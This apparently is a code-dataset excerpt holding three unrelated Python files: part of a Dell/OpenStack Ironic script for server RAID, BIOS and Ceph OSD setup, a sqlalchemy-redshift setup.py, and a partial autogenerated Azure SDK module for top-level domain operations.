disk_number = int(disk_subcomponents[2].split('-')[0])
enclosure_type = enclosure_subcomponents[1]
enclosure_numbers = enclosure_subcomponents[2].split('-')
enclosure_major_number = int(enclosure_numbers[0])
enclosure_minor_number = int(enclosure_numbers[1])
controller_type = controller_subcomponents[0]
controller_location = controller_subcomponents[1]
controller_numbers = controller_subcomponents[2].split('-')
controller_major_number = int(controller_numbers[0])
controller_minor_number = int(controller_numbers[1])
return tuple([controller_type,
controller_location,
controller_major_number,
controller_minor_number,
enclosure_type,
enclosure_major_number,
enclosure_minor_number,
disk_connection_type,
disk_number])
def physical_disk_to_key(physical_disk):
return physical_disk_id_to_key(physical_disk.id)
def configure_raid(ironic_client, node_uuid, super_role, os_volume_size_gb,
drac_client):
'''TODO: Add some selective exception handling so we can determine
when RAID configuration failed and return False. Further testing
should uncover interesting error conditions.'''
if get_raid_controller_ids(drac_client) is None:
LOG.warning("No RAID controller is present. Skipping RAID "
"configuration")
return True
LOG.info("Configuring RAID")
LOG.info("Do not power off the node; configuration will take some time")
# To manually clean the ironic node, it must be in the manageable state.
success = place_node_in_manageable_state(ironic_client, node_uuid)
if not success:
LOG.critical("Could not place node into the manageable state")
return False
# To facilitate workarounds to bugs in the ironic DRAC driver's RAID
# clean steps, execute manual cleaning twice, first to delete the
# configuration, and then to create it. The workarounds are inserted
# in-between.
'''TODO: After those upstream bugs have been resolved, perform both
clean steps, delete_configurtion() and create_configuration(),
during one (1) manual cleaning.'''
LOG.info("Deleting the existing RAID configuration")
clean_steps = [{'interface': 'raid', 'step': 'delete_configuration'}]
ironic_client.node.set_provision_state(
node_uuid,
'clean',
cleansteps=clean_steps)
LOG.info("Waiting for deletion of the existing RAID configuration to "
"complete")
ironic_client.node.wait_for_provision_state(node_uuid, 'manageable')
LOG.info("Completed deletion of the existing RAID configuration")
# Work around the bugs in the ironic DRAC driver's RAID clean steps.
target_raid_config = define_target_raid_config(
super_role, drac_client)
if target_raid_config is None:
return False
if not target_raid_config['logical_disks']:
place_node_in_available_state(ironic_client, node_uuid)
return True
# Set the target RAID configuration on the ironic node.
ironic_client.node.set_target_raid_config(node_uuid, target_raid_config)
LOG.info("Applying the new RAID configuration")
clean_steps = [{'interface': 'raid', 'step': 'create_configuration'}]
ironic_client.node.set_provision_state(
node_uuid,
'clean',
cleansteps=clean_steps)
LOG.info(
"Waiting for application of the new RAID configuration to complete")
ironic_client.node.wait_for_provision_state(node_uuid, 'manageable')
LOG.info("Completed application of the new RAID configuration")
# Return the ironic node to the available state.
place_node_in_available_state(ironic_client, node_uuid)
LOG.info("Completed RAID configuration")
return True
def place_node_in_manageable_state(ironic_client, node_uuid):
node = ironic_client.node.get(node_uuid, fields=['provision_state'])
if node.provision_state != 'manageable':
ironic_client.node.set_provision_state(node_uuid, 'manage')
ironic_client.node.wait_for_provision_state(node_uuid, 'manageable')
return True
def place_node_in_available_state(ironic_client, node_uuid):
# Return the ironic node to the available state.
ironic_client.node.set_provision_state(node_uuid, 'provide')
ironic_client.node.wait_for_provision_state(node_uuid, 'available')
def assign_role(ip_mac_service_tag, node_uuid, role_index,
ironic_client):
if role_index.role not in ROLES.keys():
flavor = role_index.role
else:
flavor = ROLES[role_index.role]
LOG.info(
"Setting role for {} to {}, flavor {}".format(
ip_mac_service_tag,
role_index.role,
flavor))
node = ironic_client.node.get(node_uuid, fields=['properties'])
_is_index = True if bool(role_index.index) else False
_role = ("node:{}-{}".format(flavor, role_index.index)
if _is_index else {"profile": flavor})
value = ("{},{},boot_mode:uefi,boot_option:"
"local".format(_role, node.properties['capabilities']))
LOG.info(str(node.properties))
LOG.info(str(value))
patch = [{'op': 'add',
'value': value,
'path': '/properties/capabilities'}]
ironic_client.node.update(node_uuid, patch)
LOG.info(str(patch))
def generate_osd_config(ip_mac_service_tag, drac_client):
controllers = drac_client.list_raid_controllers()
LOG.info("Generating OSD config for {ip}".format(ip=ip_mac_service_tag))
system_id = drac_client.get_system().uuid
spinners, ssds, nvme_drives = get_drives(drac_client)
new_osd_config = None
# Let ceph handle journaling/disks assignment
disks = spinners + ssds + nvme_drives
new_osd_config = generate_osd_config_without_journals(controllers,
disks)
# load the osd environment file
osd_config_file = os.path.join(Constants.TEMPLATES, "ceph-osd-config.yaml")
stream = open(osd_config_file, 'r+')
while True:
try:
fcntl.flock(stream, fcntl.LOCK_EX | fcntl.LOCK_NB)
break
except IOError as e:
if e.errno != errno.EAGAIN:
raise
else:
time.sleep(1)
try:
try:
current_osd_configs = yaml.load(stream)
except:
raise
node_data_lookup_str = \
current_osd_configs["parameter_defaults"]["NodeDataLookup"]
if not node_data_lookup_str:
node_data_lookup = {}
else:
LOG.info(str(node_data_lookup_str))
node_data_lookup = json.loads(json.dumps(node_data_lookup_str))
LOG.info("Checking for existing config ")
if system_id in node_data_lookup:
current_osd_config = node_data_lookup[system_id]
if new_osd_config == current_osd_config:
LOG.info("The generated OSD configuration for "
"{ip_mac_service_tag} ({system_id}) is the same as the "
"one in {osd_config_file}. Skipping OSD "
"configuration.".format(
ip_mac_service_tag=ip_mac_service_tag,
system_id=system_id,
osd_config_file=osd_config_file))
return
else:
generated_config = json.dumps(new_osd_config, sort_keys=True,
indent=2, separators=(',', ': '))
current_config = json.dumps(current_osd_config, sort_keys=True,
indent=2, separators=(',', ': '))
raise RuntimeError("The generated OSD configuration for "
"{ip_mac_service_tag} ({system_id}) is "
"different from the one in {osd_config_file}.\n"
"Generated:\n{generated_config}\n\n"
"Current:\n{current_config}\n\n"
"If this is unexpected, then check for failed"
" drives. If this is expected, then delete the"
" configuration for this node from "
"{osd_config_file} and rerun "
"assign_role.".format(
ip_mac_service_tag=ip_mac_service_tag,
system_id=system_id,
osd_config_file=osd_config_file,
generated_config=generated_config,
current_config=current_config))
node_data_lookup[system_id] = new_osd_config
# make a backup copy of the file
osd_config_file_backup = osd_config_file + ".bak"
LOG.info("Backing up original OSD config file to "
"{osd_config_file_backup}".format(
osd_config_file_backup=osd_config_file_backup))
copyfile(osd_config_file, osd_config_file_backup)
# save the new config
LOG.info("Saving new OSD config to {osd_config_file}".format(
osd_config_file=osd_config_file))
# Using the simple yaml.dump results in a completely
# unreadable file, so we do it the hard way to create
# something more user friendly
stream.seek(0)
with open(osd_config_file + ".orig", 'r') as instream:
for line in instream:
if '{}' not in line:
stream.write(line)
osd_config_str = json.dumps(node_data_lookup,
sort_keys=True,
indent=2,
separators=(',', ': '))
for line in osd_config_str.split('\n'):
line = " " + line + "\n"
stream.write(line)
stream.truncate()
instream.close()
finally:
fcntl.flock(stream, fcntl.LOCK_UN)
stream.close()
def get_drives(drac_client):
spinners = []
ssds = []
virtual_disks = drac_client.list_virtual_disks()
nvme_drives = []
raid0_disks = [vd for vd in virtual_disks if vd.raid_level != '1']
raid1_disks = []
for vd in virtual_disks:
if vd.raid_level == '1':
raid1_disks.extend(vd.physical_disks)
# Getting all physical disks of raid_disks except RAID1 disks
physical_disks = {pd.id: pd for pd in drac_client.list_physical_disks()
if pd.id not in raid1_disks}
for virtual_disk in raid0_disks:
phy_disks = [physical_disks[pd_id] for pd_id
in virtual_disk.physical_disks]
if phy_disks[0].media_type == 'hdd':
spinners.append(virtual_disk)
else:
ssds.append(virtual_disk)
{physical_disks.pop(pd.id) for pd in phy_disks}
if physical_disks:
for pd_id in physical_disks:
# Get all NVMe drives
if is_nvme_drive(physical_disks[pd_id]):
nvme_drives.append(physical_disks[pd_id])
continue
# Eliminate physical disks in a state other than non-RAID
# including failed disks
if physical_disks[pd_id].raid_status != "non-RAID":
LOG.info("Skipping disk {id}, because it has a RAID status of "
"{raid_status}".format(
id=physical_disks[pd_id].id,
raid_status=physical_disks[pd_id].raid_status))
continue
# Eliminate physical disks that have an error status
if physical_disks[pd_id].status == 'error':
LOG.warning("Not using disk {id}, because it has a status of "
"{status}".format(
id=physical_disks[pd_id].id,
status=physical_disks[pd_id].status))
continue
# Go ahead and use any physical drive that's not in an error state,
# but issue a warning if it's not in the ok or unknown state
if physical_disks[pd_id].status != 'ok' \
and physical_disks[pd_id].status != 'unknown':
LOG.warning("Using disk {id}, but it has a status of \""
"{status}\"".format(
id=physical_disks[pd_id].id,
status=physical_disks[pd_id].status))
if physical_disks[pd_id].media_type == "hdd":
spinners.append(physical_disks[pd_id])
else:
ssds.append(physical_disks[pd_id])
return spinners, ssds, nvme_drives
def generate_osd_config_without_journals(controllers, drives):
osd_config = {
'osd_scenario': 'lvm',
'osd_objectstore': 'bluestore',
'devices': []}
# RHEL 8 generate a list of by path with a common sas adress for both HDD & SDD's
# based on the first sas adress found by alphabetical order
sas_ls = []
for drive in drives:
if is_nvme_drive(drive):
continue
else:
sas_ls.append(drive.sas_address.lower()[:-2])
sas_ls.sort()
for drive in drives:
if is_nvme_drive(drive):
nvme_device_name = get_by_path_nvme_device_name(drive)
osd_config['devices'].append(nvme_device_name)
else:
base_sas = sas_ls[0]
drive_device_name = get_by_path_device_name(
drive, controllers, base_sas)
osd_config['devices'].append(drive_device_name)
return osd_config
# This method can be called with either physical or virtual disk.
# Only physical disks can be NVMe drives, and only physical disks
# have attribute named 'device_protocol'. As a result, the method
# return True only if device_protocol is present and indicates NVMe.
def is_nvme_drive(disk):
return True\
if hasattr(disk, "device_protocol") and disk.device_protocol and\
disk.device_protocol.startswith("NVMe") else False
def get_by_path_nvme_device_name(physical_disk):
bus = physical_disk.bus.lower()
return ('/dev/disk/by-path/pci-0000:'+ str(bus) + ':00.0-nvme-1')
def get_by_path_device_name(physical_disk, controllers, ref_sas):
if physical_disk.description.startswith("Virtual Disk"):
disk_index = physical_disk.description.split(" ")[2]
else:
disk_index = physical_disk.description.split(" ")[1]
for controller in controllers:
pci_bus_number = get_pci_bus_number(controller)
if physical_disk.controller == controller.id and \
controller.model.startswith("PERC H740P"):
return ('/dev/disk/by-path/pci-0000:'
'{pci_bus_number}:00.0-scsi-0:2:{disk_index}:0').format(
pci_bus_number=pci_bus_number,
disk_index=disk_index)
elif physical_disk.controller == controller.id and \
controller.model.startswith("PERC H730"):
return ('/dev/disk/by-path/pci-0000:'
'{pci_bus_number}:00.0-scsi-0:'
'{channel}:{disk_index}:0').format(
pci_bus_number=pci_bus_number,
channel=2 if physical_disk.raid_status == "online" else 0,
disk_index=disk_index)
else:
return ('/dev/disk/by-path/pci-0000:'
'{pci_bus_number}:00.0-sas-exp0x{sas_address}ff-phy{dindex}-lun-0').format(
pci_bus_number=pci_bus_number,
sas_address=ref_sas, dindex=disk_index)
def get_pci_bus_number(controller):
if controller.model.startswith("PERC H730") and \
len(controller.bus.lower()) == 1:
pci_bus_number = '0' + controller.bus.lower()
else:
pci_bus_number = controller.bus.lower()
return pci_bus_number
def get_fqdd(doc, namespace):
return utils.find_xml(doc, 'FQDD', namespace).text
def get_size_in_bytes(doc, namespace):
return utils.find_xml(doc, 'SizeInBytes', namespace).text
def select_os_volume(os_volume_size_gb, ironic_client, drac_client, node_uuid):
if os_volume_size_gb is None:
# Detect BOSS Card and find the volume size
lst_ctrls = drac_client.list_raid_controllers()
for ct in lst_ctrls :
if ct.model.startswith("BOSS"):
pci_bus_number = ct.bus.lower()
boss_disk = \
[ctrl.id for ctrl in lst_ctrls if ctrl.model.startswith("BOSS")]
LOG.info("Boss : " + str(boss_disk))
if boss_disk:
lst_physical_disks = drac_client.list_physical_disks()
for disks in lst_physical_disks:
if disks.controller in boss_disk:
os_volume_size_gb = int(disks.size_mb / 1024)
LOG.info("Detect BOSS Card {} and volume size {}".format(
disks.controller,
os_volume_size_gb))
by_path = '/dev/disk/by-path/pci-0000:' \
+ str(pci_bus_number) + ':00.0-ata-1'
LOG.info("..> " + str(by_path))
patch = [{'op': 'add',
'value': {"by_path": by_path},
'path': '/properties/root_device'}]
ironic_client.node.update(node_uuid, patch)
return
else:
drac_client = drac_client.client
# Get the virtual disks
virtual_disk_view_doc = drac_client.enumerate(DCIM_VirtualDiskView)
virtual_disk_docs = utils.find_xml(virtual_disk_view_doc,
'DCIM_VirtualDiskView',
DCIM_VirtualDiskView,
True)
raid_physical_disk_ids = []
# Look for a RAID of any type other than RAID0 and assume we want
# to install the OS on that volume. The first non-RAID0 found
# will be used.
raid_size_gb = 0
for virtual_disk_doc in virtual_disk_docs:
fqdd = get_fqdd(virtual_disk_doc, DCIM_VirtualDiskView)
raid_type = utils.find_xml(virtual_disk_doc, 'RAIDTypes',
DCIM_VirtualDiskView).text
if raid_type != NORAID and raid_type != RAID0:
LOG.info("...")
LOG.info("using bypath for VD hint")
if lst_ctrls[0].model.startswith("PERC H740P"):
pci_bus_number = get_pci_bus_number(lst_ctrls[0])
if "PowerEdge R7515" in str(ironic_client.node.get(node_uuid, fields=['properties'])):
by_path='/dev/disk/by-path/pci-0000:0' \
+ str(pci_bus_number) + ':00.0-scsi-0:2:0:0'
else:
by_path='/dev/disk/by-path/pci-0000:' \
+ str(pci_bus_number) + ':00.0-scsi-0:2:0:0'
LOG.info(".. " + str(by_path))
patch = [{'op': 'add',
'value': {"by_path": by_path},
'path': '/properties/root_device'}]
ironic_client.node.update(node_uuid, patch)
elif lst_ctrls[0].model.startswith("PERC H730"):
LOG.info("using bypath for VD hint")
pci_bus_number = get_pci_bus_number(lst_ctrls[0])
LOG.info(">> " + str(lst_ctrls[0].description))
by_path = ('/dev/disk/by-path/pci-0000:'
'{pci_bus_number}:00.0-scsi-0:2:0:0').format(
pci_bus_number=pci_bus_number)
LOG.info(".. " + str(by_path))
patch = [{'op': 'add',
'value': {"by_path": by_path},
'path': '/properties/root_device'}]
ironic_client.node.update(node_uuid, patch)
# Get the size
raid_size = get_size_in_bytes(virtual_disk_doc,
DCIM_VirtualDiskView)
raid_size_gb = int(int(raid_size) / units.Gi)
# Get the physical disks that back this RAID
raid_physical_disk_docs = utils.find_xml(
virtual_disk_doc,
'PhysicalDiskIDs',
DCIM_VirtualDiskView,
True)
for raid_physical_disk_doc in raid_physical_disk_docs:
raid_physical_disk_id = raid_physical_disk_doc.text
raid_physical_disk_ids.append(raid_physical_disk_id)
LOG.debug(
"Found RAID {} virtual disk {} with a size of {} "
"bytes comprised of physical disks:\n {}".format(
RAID_TYPE_TO_DESCRIPTION[raid_type],
fqdd,
raid_size,
"\n ".join(raid_physical_disk_ids)))
return
# Note: This code block represents single disk scenario.
if raid_size_gb == 0:
if virtual_disk_docs:
raid0_disk_sizes = []
for virtual_disk_doc in virtual_disk_docs:
fqdd = get_fqdd(virtual_disk_doc, DCIM_VirtualDiskView)
raid_type = utils.find_xml(
virtual_disk_doc,
'RAIDTypes',
DCIM_VirtualDiskView).text
if raid_type == RAID0:
raid_size = get_size_in_bytes(virtual_disk_doc,
DCIM_VirtualDiskView)
raid_size_gb = int(int(raid_size) / units.Gi)
raid0_disk_sizes.append(raid_size_gb)
# Get the physical disks that back this RAID
raid_physical_disk_docs = utils.find_xml(
virtual_disk_doc,
'PhysicalDiskIDs',
DCIM_VirtualDiskView,
True)
for raid_physical_disk_doc in \
raid_physical_disk_docs:
raid_physical_disk_id = \
raid_physical_disk_doc.text
raid_physical_disk_ids.append(
raid_physical_disk_id)
LOG.debug(
"Found RAID {} virtual disk {} with a size of"
" {} "
"bytes comprised of physical disks:\n"
" {}".format(
RAID_TYPE_TO_DESCRIPTION[raid_type],
fqdd,
raid_size,
"\n ".join(raid_physical_disk_ids)))
break
if len(raid0_disk_sizes) != 1:
raise RuntimeError(
"There must be a non-RAID0 virtual disk,"
"a single disk RAID0, or a single JBOD disk"
"to install the OS on,"
"or os-volume-size-gb must be specified.")
else:
physical_disk_view_doc = drac_client.enumerate(
DCIM_PhysicalDiskView)
physical_disk_docs = utils.find_xml(
physical_disk_view_doc,
'DCIM_PhysicalDiskView',
DCIM_PhysicalDiskView,
True)
physical_disk_sizes = [
get_size_in_bytes(physical_disk_doc,
DCIM_PhysicalDiskView)
for physical_disk_doc in physical_disk_docs]
if len(physical_disk_sizes) != 1:
raise RuntimeError(
"There must be a non-RAID0 virtual disk,"
"a single disk RAID0, or a single JBOD disk"
"to install the OS on,"
"or os-volume-size-gb must be specified.")
os_volume_size_gb = int(int(physical_disk_sizes[0]) / units.Gi)
# Now check to see if we have any physical disks that don't back
# the RAID that are the same size as the RAID
# Get the physical disks
physical_disk_view_doc = drac_client.enumerate(
DCIM_PhysicalDiskView)
physical_disk_docs = utils.find_xml(physical_disk_view_doc,
'DCIM_PhysicalDiskView',
DCIM_PhysicalDiskView,
True)
for physical_disk_doc in physical_disk_docs:
fqdd = get_fqdd(physical_disk_doc, DCIM_PhysicalDiskView)
if fqdd not in raid_physical_disk_ids:
physical_disk_size = get_size_in_bytes(
physical_disk_doc, DCIM_PhysicalDiskView)
physical_disk_size_gb = int(int(physical_disk_size) / units.Gi)
if physical_disk_size_gb == raid_size_gb:
# If we did find a disk that's the same size as the
# located RAID (in GB), then we can't tell Ironic what
# volume to install the OS on.
# Abort the install at this point instead of having
# the OS installed on a random volume.
raise RuntimeError(
"Physical disk {} has the same size in GB ({}) "
"as the RAID. Unable to specify the OS disk to "
"Ironic.".format(fqdd, physical_disk_size_gb))
if os_volume_size_gb is not None:
# If os_volume_size_gb was specified then just blindly use that
raid_size_gb = os_volume_size_gb
volume_type = "volume"
else:
# If we didn't find a disk the same size as the located RAID, then use
# the size of the RAID set above
volume_type = RAID_TYPE_TO_DESCRIPTION[raid_type]
# Set the root_device property in ironic to the volume size in gigs
LOG.info("Setting the OS volume for this node to the {} with size "
"{} GB".format(volume_type, raid_size_gb))
patch = [{'op': 'add',
'value': {"size": raid_size_gb},
'path': '/properties/root_device'}]
ironic_client.node.update(node_uuid, patch)
def configure_bios(node, ironic_client, settings, drac_client):
LOG.info("Configuring BIOS: settings: {}".format(str(settings)))
LOG.info("Configuring BIOS: node: {}".format(str(node)))
if 'drac' not in node.driver:
LOG.critical("Node is not being managed by an iDRAC driver")
return False
# Make sure the iDRAC is ready before configuring BIOS
drac_client.wait_until_idrac_is_ready()
# Filter out settings that are unknown.
response = ironic_client.node.vendor_passthru(
node.uuid,
'get_bios_config',
http_method='GET')
unknown_attribs = set(settings).difference(response.__dict__)
if unknown_attribs:
LOG.warning(
"Disregarding unknown BIOS settings {}".format(
', '.join(unknown_attribs)))
for attr in unknown_attribs:
del settings[attr]
response = ironic_client.node.vendor_passthru(
node.uuid,
'set_bios_config',
args=settings,
http_method='POST')
if not response.is_commit_required:
LOG.info("Completed BIOS configuration")
return True
LOG.info("Rebooting the node to apply BIOS configuration")
args = {'reboot': True}
response = ironic_client.node.vendor_passthru(
node.uuid,
'commit_bios_config',
args=args,
http_method='POST')
LOG.info(
"Waiting for BIOS configuration to complete; this may take some time")
LOG.info("Do not power off the node")
job_ids = [response.job_id]
JobHelper.wait_for_job_completions(ironic_client, node.uuid)
LOG.info("Completed BIOS configuration")
return JobHelper.determine_job_outcomes(drac_client, job_ids)
def ensure_node_is_powered_off(drac_client):
# Power off the node only if it is not already powered off. The Dell Common
# Information Model Extensions (DCIM) method used to power off a node is
# not idempotent.
#
# Testing found that attempting to power off a node while it is powered off
# raises an exception, DRACOperationFailed with the message 'The command
# failed to set RequestedState'. That message is associated with a message
# ID output parameter of the DCIM_ComputerSystem.RequestStateChange()
# method. The message ID is SYS021. This is documented in the Base Server
# and Physical Asset Profile, Version 1.2.0
# (http://en.community.dell.com/techcenter/extras/m/white_papers/20440458/download).
# See section 8.1 DCIM_ComputerSystem.RequestStateChange(), beginning on p.
# 22 of 25.
#
# An alternative approach was considered, unconditionally powering off the
# node, catching the DRACOperationFailed exception, and ignoring it.
# However, because neither the documentation nor exception provides details
# about the cause, that approach could mask an interesting error condition.
if drac_client.get_power_state() is not POWER_OFF:
LOG.info("Powering off the node")
drac_client.set_power_state(POWER_OFF)
def main():
try:
drac_client = None
args = parse_arguments()
LoggingHelper.configure_logging(args.logging_level)
flavor_settings_filename = os.path.expanduser(args.flavor_settings)
flavor_settings = get_flavor_settings(flavor_settings_filename)
if flavor_settings is None:
sys.exit(1)
ironic_client = IronicHelper.get_ironic_client()
node = IronicHelper.get_ironic_node(ironic_client,
args.ip_mac_service_tag)
if node is None:
LOG.critical("Unable to find node {}".format(
args.ip_mac_service_tag))
sys.exit(1)
drac_client = get_drac_client(args.node_definition, node)
# Assume all node roles that are not in ROLES are edge computes
# and act accordingly and set bios to compute settings
super_role = args.role_index.role
if super_role not in ROLES.keys():
super_role = 'compute'
assign_role(
args.ip_mac_service_tag,
node.uuid,
args.role_index,
ironic_client)
if node.driver == "idrac":
bios_settings = calculate_bios_settings(
super_role,
flavor_settings,
flavor_settings_filename)
if bios_settings is None:
sys.exit(1)
if not args.skip_raid_config:
succeeded = configure_raid(
ironic_client,
node.uuid,
super_role,
args.os_volume_size_gb,
drac_client)
if not succeeded:
sys.exit(1)
else:
LOG.info("Skipping RAID configuration")
if not args.skip_bios_config:
succeeded = configure_bios(
node,
ironic_client,
bios_settings,
drac_client)
if not succeeded:
sys.exit(1)
else:
LOG.info("Skipping BIOS configuration")
# Select the volume for the OS to be installed on
select_os_volume(args.os_volume_size_gb, ironic_client, drac_client,
node.uuid)
if args.role_index.role not in ROLES.keys():
flavor = args.role_index.role
else:
flavor = ROLES[args.role_index.role]
# Generate Ceph OSD/journal configuration for storage nodes
if flavor == "ceph-storage" or flavor == "computehci" or flavor == "powerflex-storage":
generate_osd_config(args.ip_mac_service_tag, drac_client)
except (DRACOperationFailed, DRACUnexpectedReturnValue,
InternalServerError, KeyError, TypeError, ValueError,
WSManInvalidResponse, WSManRequestFailure):
LOG.exception("")
sys.exit(1)
except SystemExit:
raise
except: # noqa: E722
LOG.exception("Unexpected error")
sys.exit(1)
finally:
# Leave the node powered off.
if drac_client is not None:
ensure_node_is_powered_off(drac_client)
if __name__ == "__main__":
main()
| 39.078999
| 110
| 0.603241
|
f07de8aeac764fd94669f1ab488b9c68166c7eef
| 1,712
|
py
|
Python
|
setup.py
|
aboedo/sqlalchemy-redshift
|
bf81bb81e42987bb81345845fede560d9184302f
|
[
"MIT"
] | 1
|
2019-06-04T21:01:13.000Z
|
2019-06-04T21:01:13.000Z
|
setup.py
|
aboedo/sqlalchemy-redshift
|
bf81bb81e42987bb81345845fede560d9184302f
|
[
"MIT"
] | 1
|
2020-05-23T10:54:44.000Z
|
2020-05-23T10:54:44.000Z
|
setup.py
|
aboedo/sqlalchemy-redshift
|
bf81bb81e42987bb81345845fede560d9184302f
|
[
"MIT"
] | 1
|
2020-12-24T10:20:24.000Z
|
2020-12-24T10:20:24.000Z
|
from setuptools import setup
readme = open('README.rst').read()
history = open('CHANGES.rst').read().replace('.. :changelog:', '')
setup(
name='sqlalchemy-redshift',
version='0.5.1.dev0',
description='Amazon Redshift Dialect for sqlalchemy',
long_description=readme + '\n\n' + history,
author='Matt George',
author_email='mgeorge@gmail.com',
maintainer='Thomas Grainger',
maintainer_email='sqlalchemy-redshift@graingert.co.uk',
license="MIT",
url='https://github.com/sqlalchemy-redshift/sqlalchemy-redshift',
packages=['sqlalchemy_redshift', 'redshift_sqlalchemy'],
package_data={'sqlalchemy_redshift': ['redshift-ssl-ca-cert.pem']},
install_requires=[
'psycopg2>=2.5',
# requires sqlalchemy.sql.base.DialectKWArgs.dialect_options, new in
# version 0.9.2
'SQLAlchemy>=0.9.2',
],
classifiers=[
"Development Status :: 4 - Beta",
"Environment :: Console",
"Intended Audience :: Developers",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
"Programming Language :: Python",
"Programming Language :: Python :: 2",
"Programming Language :: Python :: 2.6",
"Programming Language :: Python :: 2.7",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.3",
"Programming Language :: Python :: 3.4",
"Programming Language :: Python :: 3.5",
],
entry_points={
'sqlalchemy.dialects': [
'redshift = sqlalchemy_redshift.dialect:RedshiftDialect',
'redshift.psycopg2 = sqlalchemy_redshift.dialect:RedshiftDialect',
]
},
)
| 36.425532
| 78
| 0.623832
|
3d26bcd39754fa5a4d960e31e422509bacafe3e1
| 9,754
|
py
|
Python
|
azure-mgmt-web/azure/mgmt/web/operations/top_level_domains_operations.py
|
CharaD7/azure-sdk-for-python
|
9fdf0aac0cec8a15a5bb2a0ea27dd331dbfa2f5c
|
[
"MIT"
] | null | null | null |
azure-mgmt-web/azure/mgmt/web/operations/top_level_domains_operations.py
|
CharaD7/azure-sdk-for-python
|
9fdf0aac0cec8a15a5bb2a0ea27dd331dbfa2f5c
|
[
"MIT"
] | null | null | null |
azure-mgmt-web/azure/mgmt/web/operations/top_level_domains_operations.py
|
CharaD7/azure-sdk-for-python
|
9fdf0aac0cec8a15a5bb2a0ea27dd331dbfa2f5c
|
[
"MIT"
] | null | null | null |
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from msrest.pipeline import ClientRawResponse
from msrestazure.azure_exceptions import CloudError
import uuid
from .. import models
class TopLevelDomainsOperations(object):
"""TopLevelDomainsOperations operations.
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An objec model deserializer.
"""
def __init__(self, client, config, serializer, deserializer):
self._client = client
self._serialize = serializer
self._deserialize = deserializer
self.config = config
def get_get_top_level_domains(
self, custom_headers=None, raw=False, **operation_config):
"""Lists all top level domains supported for registration.
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:rtype: :class:`TopLevelDomainPaged
<azure.mgmt.web.models.TopLevelDomainPaged>`
"""
def internal_paging(next_link=None, raw=False):
if not next_link:
# Construct URL
url = '/subscriptions/{subscriptionId}/providers/Microsoft.DomainRegistration/topLevelDomains'
path_format_arguments = {
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.config.api_version", self.config.api_version, 'str')
else:
url = next_link
query_parameters = {}
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.get(url, query_parameters)
response = self._client.send(
request, header_parameters, **operation_config)
if response.status_code not in [200]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
return response
# Deserialize response
deserialized = models.TopLevelDomainPaged(internal_paging, self._deserialize.dependencies)
if raw:
header_dict = {}
client_raw_response = models.TopLevelDomainPaged(internal_paging, self._deserialize.dependencies, header_dict)
return client_raw_response
return deserialized
def get_top_level_domain(
self, name, custom_headers=None, raw=False, **operation_config):
"""Gets details of a top level domain.
:param name: Name of the top level domain
:type name: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:rtype: :class:`TopLevelDomain <azure.mgmt.web.models.TopLevelDomain>`
:rtype: :class:`ClientRawResponse<msrest.pipeline.ClientRawResponse>`
if raw=true
"""
# Construct URL
url = '/subscriptions/{subscriptionId}/providers/Microsoft.DomainRegistration/topLevelDomains/{name}'
path_format_arguments = {
'name': self._serialize.url("name", name, 'str'),
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.config.api_version", self.config.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.get(url, query_parameters)
response = self._client.send(request, header_parameters, **operation_config)
if response.status_code not in [200]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('TopLevelDomain', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
def list_top_level_domain_agreements(
self, name, include_privacy=None, custom_headers=None, raw=False, **operation_config):
"""Lists legal agreements that user needs to accept before purchasing
domain.
:param name: Name of the top level domain
:type name: str
:param include_privacy: If true then the list of agreements will
inclue agreements for domain privacy as well.
:type include_privacy: bool
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:rtype: :class:`TldLegalAgreementPaged
<azure.mgmt.web.models.TldLegalAgreementPaged>`
"""
agreement_option = models.TopLevelDomainAgreementOption(include_privacy=include_privacy)
def internal_paging(next_link=None, raw=False):
if not next_link:
# Construct URL
url = '/subscriptions/{subscriptionId}/providers/Microsoft.DomainRegistration/topLevelDomains/{name}/listAgreements'
path_format_arguments = {
'name': self._serialize.url("name", name, 'str'),
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.config.api_version", self.config.api_version, 'str')
else:
url = next_link
query_parameters = {}
# Construct headers
header_parameters = {}
